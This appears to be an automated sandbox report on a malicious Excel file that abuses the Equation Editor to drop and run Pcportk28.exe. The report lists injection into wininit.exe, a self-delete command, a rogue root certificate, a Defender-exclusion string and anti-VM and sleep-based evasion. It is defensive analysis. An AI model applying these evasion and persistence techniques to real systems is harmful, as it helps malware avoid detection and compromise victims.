Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00851D80 NtSuspendThread,		5_2_00851D80
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025200C4 NtCreateFile,LdrInitializeThunk,		7_2_025200C4
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025207AC NtCreateMutant,LdrInitializeThunk,		7_2_025207AC
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		7_2_0251FAD0
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FAE8 NtQueryInformationProcess,LdrInitializeThunk,		7_2_0251FAE8
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FAB8 NtQueryValueKey,LdrInitializeThunk,		7_2_0251FAB8
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FB50 NtCreateKey,LdrInitializeThunk,		7_2_0251FB50
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FB68 NtFreeVirtualMemory,LdrInitializeThunk,		7_2_0251FB68
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FBB8 NtQueryInformationToken,LdrInitializeThunk,		7_2_0251FBB8
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251F900 NtReadFile,LdrInitializeThunk,		7_2_0251F900
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251F9F0 NtClose,LdrInitializeThunk,		7_2_0251F9F0
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		7_2_0251FED0
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FFB4 NtCreateSection,LdrInitializeThunk,		7_2_0251FFB4
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FC60 NtMapViewOfSection,LdrInitializeThunk,		7_2_0251FC60
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FDC0 NtQuerySystemInformation,LdrInitializeThunk,		7_2_0251FDC0
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FD8C NtDelayExecution,LdrInitializeThunk,		7_2_0251FD8C
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02520048 NtProtectVirtualMemory,		7_2_02520048
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02520078 NtResumeThread,		7_2_02520078
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02520060 NtQuerySection,		7_2_02520060
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025210D0 NtOpenProcessToken,		7_2_025210D0
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02521148 NtOpenThread,		7_2_02521148
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0252010C NtOpenDirectoryObject,		7_2_0252010C
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025201D4 NtSetValueKey,		7_2_025201D4
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FA50 NtEnumerateValueKey,		7_2_0251FA50
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FA20 NtQueryInformationFile,		7_2_0251FA20
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FBE8 NtQueryVirtualMemory,		7_2_0251FBE8
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251F8CC NtWaitForSingleObject,		7_2_0251F8CC
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02521930 NtSetContextThread,		7_2_02521930
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251F938 NtWriteFile,		7_2_0251F938
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FE24 NtWriteVirtualMemory,		7_2_0251FE24
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FEA0 NtReadVirtualMemory,		7_2_0251FEA0
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FF34 NtQueueApcThread,		7_2_0251FF34
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FFFC NtCreateProcessEx,		7_2_0251FFFC
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02520C40 NtGetContextThread,		7_2_02520C40
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FC48 NtSetInformationFile,		7_2_0251FC48
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FC30 NtOpenProcess,		7_2_0251FC30
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FC90 NtUnmapViewOfSection,		7_2_0251FC90
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0251FD5C NtEnumerateKey,		7_2_0251FD5C
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_02521D80 NtSuspendThread,		7_2_02521D80
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000F85E0 NtCreateFile,		7_2_000F85E0
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000F8690 NtReadFile,		7_2_000F8690
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000F8710 NtClose,		7_2_000F8710
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000F87C0 NtAllocateVirtualMemory,		7_2_000F87C0
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000F85DA NtCreateFile,		7_2_000F85DA
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000F870B NtClose,		7_2_000F870B

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: 7916.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Tries to load missing DLLs

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Section loaded: msvbvm60.dll

Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\Pcportk28.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: i4L[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Pcportk28.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads software policies

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
Source: C:\Users\Public\Pcportk28.exe	Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
Source: C:\Windows\SysWOW64\wininit.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe			Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$SWIFT - Copy - Copy.xlsx

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR379.tmp

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/6@6/5

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\Public\Pcportk28.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Binary contains paths to development resources

Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\Public\Pcportk28.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Submission file is bigger than most known malware samples

Source: SWIFT - Copy - Copy.xlsx

Static file information: File size 1400294 > 1048576

Binary contains paths to debug symbols

Source:	Binary string: wininit.pdb source: Pcportk28.exe, 00000005.00000002.519519469.0000000000479000.00000004.00000020.sdmp, Pcportk28.exe, 00000005.00000002.519453016.0000000000380000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000002.520658303.00000000009C0000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.484779384.0000000000550000.00000004.00000001.sdmp, Pcportk28.exe, 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.485865718.00000000006B0000.00000004.00000001.sdmp, wininit.exe
Source:	Binary string: ILi.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000000.483141980.00000000010E2000.00000020.00020000.sdmp

Document has a 'vbamacros' value indicative of goodware

Source: SWIFT - Copy - Copy.xlsx

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

.NET source code contains potential unpacker

Source: i4L[1].exe.2.dr, sb/gq.cs	.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Pcportk28.exe.2.dr, sb/gq.cs	.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs	.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs	.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.3.unpack, sb/gq.cs	.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.10.unpack, sb/gq.cs	.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs	.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.4.unpack, sb/gq.cs	.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.2.unpack, sb/gq.cs	.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs	.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.Pcportk28.exe.10e0000.5.unpack, sb/gq.cs	.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.6.unpack, sb/gq.cs	.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Pcportk28.exe.10e0000.8.unpack, sb/gq.cs	.Net Code: Rv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

.NET source code contains method to dynamically call methods (often used by packers)

Source: i4L[1].exe.2.dr, sb/gq.cs	.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: Pcportk28.exe.2.dr, sb/gq.cs	.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 4.2.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs	.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 4.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs	.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.3.unpack, sb/gq.cs	.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.10.unpack, sb/gq.cs	.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.1.unpack, sb/gq.cs	.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.4.unpack, sb/gq.cs	.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.2.unpack, sb/gq.cs	.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.0.unpack, sb/gq.cs	.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.2.Pcportk28.exe.10e0000.5.unpack, sb/gq.cs	.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.6.unpack, sb/gq.cs	.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
Source: 5.0.Pcportk28.exe.10e0000.8.unpack, sb/gq.cs	.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\Pcportk28.exe	Code function: 4_2_010E9A2A push es; retf		4_2_010E9A37
Source: C:\Users\Public\Pcportk28.exe	Code function: 4_2_010E9767 push 3A000004h; retf 0000h		4_2_010E976C
Source: C:\Users\Public\Pcportk28.exe	Code function: 4_2_010EA0FF push es; iretd		4_2_010EA151
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0041B822 push eax; ret		5_2_0041B828
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0041B82B push eax; ret		5_2_0041B892
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0041B88C push eax; ret		5_2_0041B892
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_004153E0 push es; retf		5_2_004153E9
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00415C4E push ebp; ret		5_2_00415C57
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0041CD74 push eax; ret		5_2_0041CD76
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_00414EAF pushad ; ret		5_2_00414EB0
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0041CF70 pushad ; ret		5_2_0041CF74
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_0041B7D5 push eax; ret		5_2_0041B828
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_010EA0FF push es; iretd		5_2_010EA151
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_010E9A2A push es; retf		5_2_010E9A37
Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_010E9767 push 3A000004h; retf 0000h		5_2_010E976C
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_0252DFA1 push ecx; ret		7_2_0252DFB4
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000F53E0 push es; retf		7_2_000F53E9
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000FB7D5 push eax; ret		7_2_000FB828
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000FB82B push eax; ret		7_2_000FB892
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000FB822 push eax; ret		7_2_000FB828
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000FB88C push eax; ret		7_2_000FB892
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000F5C4E push ebp; ret		7_2_000F5C57
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000FCD74 push eax; ret		7_2_000FCD76
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000F4EAF pushad ; ret		7_2_000F4EB0
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_000FCF70 pushad ; ret		7_2_000FCF74

Binary may include packed or encrypted code

Source: initial sample	Static PE information: section name: .text entropy: 7.09183457807
Source: initial sample	Static PE information: section name: .text entropy: 7.09183457807

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\Pcportk28.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\Pcportk28.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\Pcportk28.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Stores large binary data to the registry

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 4.2.Pcportk28.exe.259637c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Pcportk28.exe.259e388.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Pcportk28.exe.25b30a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Pcportk28.exe PID: 2124, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Pcportk28.exe, 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Pcportk28.exe, 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\Pcportk28.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\Pcportk28.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wininit.exe	RDTSC instruction interceptor: First address: 00000000000E8604 second address: 00000000000E860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wininit.exe	RDTSC instruction interceptor: First address: 00000000000E899E second address: 00000000000E89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2780	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe TID: 836	Thread sleep time: -34932s >= -30000s			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe TID: 2128	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe TID: 672	Thread sleep time: -38000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\wininit.exe

Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\Pcportk28.exe

Code function: 5_2_004088D0 rdtsc

5_2_004088D0

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\Pcportk28.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Queries a list of all running processes

Source: C:\Users\Public\Pcportk28.exe

Process information queried: ProcessInformation

Jump to behavior

Contains medium sleeps (>= 30s)

Source: C:\Users\Public\Pcportk28.exe	Thread delayed: delay time: 34932			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmp	Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
Source: Pcportk28.exe, 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp	Binary or memory string: +Qemu
Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.487654318.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
